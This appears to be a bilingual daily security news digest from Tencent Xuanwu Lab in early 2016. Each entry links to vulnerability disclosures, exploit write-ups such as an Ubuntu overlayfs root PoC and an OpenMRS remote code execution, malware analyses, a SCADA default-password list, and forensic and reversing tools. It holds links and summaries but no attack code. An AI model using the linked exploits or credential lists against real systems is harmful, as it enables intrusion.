腾讯玄武实验室安全动态推送
Tencent Xuanwu Lab Security Daily News
-
[ Android ] New post on a vulnerability I found in the #Android Blackphone (BP1) is now up https://www.sentinelone.com/blog/vulnerability-in-blackphone-puts-devices-at-risk-for-takeover/ CVE-2015-6841
"Android Blackphone 被发现了一个漏洞,通过该漏洞,攻击者可以远程控制手机的调制解调器(CVE-2015-6841): https://t.co/5pKp812zLO"
-
[ Attrack ] SMS Phishing Campaign Spreads in China https://blogs.mcafee.com/mcafee-labs/sms-phishing-campaign-spreads-china/
"国内的短信钓鱼活动 https://t.co/jfvnXAnPri "
-
[ Attrack ] Part two of our analysis of a phishing campaign targeting financial data theft in the healthcare field http://ow.ly/WIDTh #infosec
"医疗领域金融数据泄露钓鱼行动分析, Part 2: https://t.co/LOiPJXGUq7 #infosec"
-
[ Browser ] In IE11 (latest docmode), the event handling for passive elements depends on "markup quality" (i.e. quirks mode): http://pastebin.com/raw/BSGDKYUn
"IE11 中被动元素的消息处理取决于标记质量: https://t.co/UfxvlxGdtm"
-
[ Defend ] Protecting Windows Networks - Applocker : http://dfir-blog.com/2016/01/03/protecting-windows-networks-applocker/
"在对抗未知恶意软件方面,应用白名单一直是一个很有效的技术。然而由于配置不方便以及绕过方法层出不穷,所以效果也不是特别好。本篇 Blog 介绍一款 Windows 原生的一项应用白名单技术 - Applocker: https://t.co/X67xooz4gB"
-
[ Detect ] Malicious PDF Analysis : http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/ cc: @ DidierStevens #b2b (E-book/pdf)
"恶意 PDF 文档分析,Didier Stevens 2010 年写的一篇文档: https://t.co/KcXOooaPCQ "
-
[ Forensics ] NTFS Forensics : A Programmers View of Raw Filesystem Data Extraction : http://grayscale-research.org/new/pdfs/NTFS%20forensics.pdf
"NTFS 取证: 从程序员的角度看原始文件系统数据提权: https://t.co/EeudpEmQma"
-
[ Forensics ] File system forensic Analysis : http://www.campus64.com/digital_learning/data/cyber_forensics_essentials/info_file_system_forensic_analysis.pdf (pdf) #b2b
"[图书] 文件系统取证分析,来自 Addison-Wesley Professional 2015 年 3 月份出版的一本书,作者为 Brian Carrier: (pdf) https://t.co/Mz8YFXuknM"
-
[ Hardware ] GunCon3 Reversing and Linux Driver https://beardypig.github.io/2016/01/06/guncon3/
"Play Station 3 GunCon3 枪逆向: https://t.co/h9rChcsL8v"
-
[ Linux ] [local] - Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit: Ubuntu 14.04 LTS, 15.10 overlayfs - Local Ro... http://bit.ly/1mzKFGg
"Ubuntu 14.04 LTS, 15.10 overlayfs 本地 Root 提权 PoC : https://t.co/JlpCw710Jh "
-
[ Malware ] New TeslaCrypt Ransomware Arrives via Spam https://blogs.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
"TeslaCrypt 勒索软件的新变种通过垃圾邮件传播: https://t.co/bAaaYgTK8A"
-
[ Malware ] Destructive Disakil malware linked to Ukraine power outages : http://www.symantec.com/connect/blogs/destructive-disakil-malware-linked-ukraine-power-outages-also-used-against-media-organizations ,Sample : https://ics.sans.org/blog/2016/01/01/potential-sample-of-malware-from-the-ukrainian-cyber-attack-uncovered
"Disakil 恶意软件与乌克兰断电事件有关: https://t.co/6ijMkBmX7l 样本 : https://t.co/PvyzYxVWpO"
-
[ Malware ] Yet Another Signed Malware - Spymel http://research.zscaler.com/2016/01/yet-another-signed-malware-spymel.html
"又一个带有签名的恶意软件 - Spymel: https://t.co/oyfEowf6fX"
-
[ Network ] New post: Let’s Encrypt Now Being Abused By Malvertisers http://bit.ly/1TEMwDY @ TrendMicro
"Let's Encrypt 正被恶意广告主滥用,将用户引向 Angler Exploit Kit。 Let's Encrypt 项目致力于为所有的网站免费提供证书,启用 HTTPS。 https://t.co/XnubVrZCHI"
-
[ Network ] Running a Hidden Tor Service with Docker Compose : http://randywestergren.com/running-a-hidden-tor-service-with-docker-compose/
"利用 Docker Compose 运行隐藏的 Tor 服务: https://t.co/0JPXHEEI6t"
-
[ Network ] Scanning the Internet for backdoored ScreenOS devices: some statistics and tales of evading honeypots http://blog.whatever.io/2016/01/06/scanning-the-internet-for-backdoored-screenos-devices-some-statistics-and-tales-of-evading-honeypots/
"扫描互联网上的后门 ScreenOS 设备: 统计数据和蜜罐逃逸的故事 https://t.co/Oc0AjWd1Ae "
-
[ Others ] Unauthenticated remote code execution in OpenMRS http://goo.gl/fb/iPuRtN #FullDisclosure
"OpenMRS(开放医疗记录系统)未授权的远程代码执行: https://t.co/8Ym68EZCzU "
-
[ Others ] Analysis Of A Corrupt OLE File : http://videos.didierstevens.com/2015/12/30/analysis-of-a-corrupt-ole-file/ cc: @ DidierStevens
"对一个损坏的 OLE 文件的分析,是个演示视频,来自 Didier Stevens: https://t.co/URmTyvwi4K "
-
[ Others ] MEDCIN Engine Exploitation – Part 2 (CVE-2015-2898-2901, CVE-2015-6006) https://www.securifera.com/blog/2016/01/06/medcin-engine-exploitation-part-2-cve-2015-2898-2901-cve-2015-6006/
"EHR(电子健康病历)知识库引擎 MEDCIN 漏洞利用 Part 2 (CVE-2015-2898-2901, CVE-2015-6006) : https://t.co/SEgGc5Ql9a"
-
[ Others ] Security Analysis of VoLTE, Part 1 https://www.insinuator.net/2016/01/security-analysis-of-volte-part-1/
"VoLTE 安全性分析, Part 1 https://t.co/1ogZrjzjGc"
-
[ Others ] Security experts disclosed SCADAPASS, a list of default credentials for ICS and SCADA systems http://securityaffairs.co/wordpress/43344/hacking/experts-disclosed-scadapass.html
"来自 SCADA StrangeLove 的安全专家披露了 SCADAPASS, 这是一个默认密码列表,其中涉及超过 100 个的 ICS 和 SCADA 产品 https://t.co/L2nuBKGIdh "
-
[ Others ] Monads to Machine Code (Part 1) - JIT compilation to x86 machine code in Haskell http://www.stephendiehl.com/posts/monads_machine_code.html
"自己动手用 Haskell 写一个 LLVM JIT 引擎,将 Monads 结构转为机器码 https://t.co/vPrpg9qbBs"
-
[ Popular Software ] Kaspersky Labs DLL Hijacking https://cxsecurity.com/issue/WLB-2016010022
"Kaspersky DLL 劫持漏洞,该漏洞需要用户将某些 DLL 放入 'Downloads' 文件夹 https://t.co/HBuGZE7xtN"
-
[ ReverseEngineering ] Reverse Engineering for Malware Analysis - cheat sheet wallpaper : http://r00ted.com/cheat%20sheet%20reverse%20v5.png cc: @ r00tbsd
"逆向工程师的桌面壁纸 - 包括一些常用的 IDA 命令、寄存器说明、Windbg 命令、常用汇编指令等等,一张图片: https://t.co/vTzegAbOYf cc: @r00tbsd"
-
[ Tools ] ViDi (Visual Disassembler) - tool for static analysis of PE files : https://hshrzd.wordpress.com/vidi-visual-disassembler/ cc:@ hasherezade https://t.co/8Xh4Sb3QSM
"ViDi - 可视化的反汇编工具,用于 PE 文件的静态分析,该工具基于 bearparser 和 capstone: https://t.co/vFwLbE3xuE https://t.co/8Xh4Sb3QSM"
-
[ Tools ] Writing a Malware Config Parser Using Radare2 and Ruby http://www.morphick.com/blog/2016/1/6/writing-a-malware-config-parser-using-radare2-and-ruby
"用 Radare2 和 Ruby 写一个恶意软件配置解析器 https://t.co/cN0MZb8ywi"
-
[ Tools ] Frida-cfg-hook - instrumentation script which leverages CFG to intercept indirect calls in CFG-enabled Win binaries https://github.com/fdfalcon/frida-cfg-hook
"Frida-cfg-hook - 基于 Frida 的插桩工具,该工具在启用 CFG 的 Windows 二进制程序中可以劫持 Indirect Call, 劫持的方法是 Hook ntdll!LdrpValidateUserCallTarget: https://t.co/AHZnq2UFaX"
-
[ Tools ] We wrapped up #Unit42's series on how to use #IDAPython to make your life easier. Part 4: http://bit.ly/1Rj73AG @ jgrunzweig @ Unit42_Intel
"IDAPython 让你的生活更轻松 Part 4: https://t.co/IOFFPgCoCb"
-
[ Vulnerability ] Signature forgery vulnerability in python-rsa : https://blog.filippo.io/bleichenbacher-06-signature-forgery-in-python-rsa/ //CVE-2016-1494 cc: @ FiloSottile
"python-rsa 签名伪造漏洞(CVE-2016-1494): https://t.co/Kg1LsSxh6w "
-
[ Web Security ] Web vulnerabilities to gain access to the system http://www.enye-sec.org/en/papers/web_vuln-en.txt
"从 Web 漏洞到获取系统访问权限,远程执行命令: https://t.co/k5TJqM6WGg"
-
[ Web Security ] DOM XSS 101 Walk-Through : http://neonprimetime.blogspot.in/2016/01/dom-xss-101-walk-through.html
"DOM XSS 介绍: https://t.co/pNB2auzOj6"
-
[ Web Security ] All versions of @ Drupal vulnerable to code execution, credential theft via #MitM attack - http://ow.ly/WIUHo
"所有版本的 Drupal 都存在代码执行漏洞,密钥凭证可通过中间人攻击窃取, ThreatPost 的报道: https://t.co/6sJBMiMcjx IOActive 对该漏洞的分析: http://blog.ioactive.com/2016/01/drupal-insecure-update-process.html "
-
[ Windows ] Reversing and Recreating a Protected DLL : http://reverseengineeringtips.blogspot.in/2016/01/bypassing-protections-reversing-and.html
"绕过保护: 逆向和重建一个受保护的 DLL: https://t.co/H82agAS7Za"
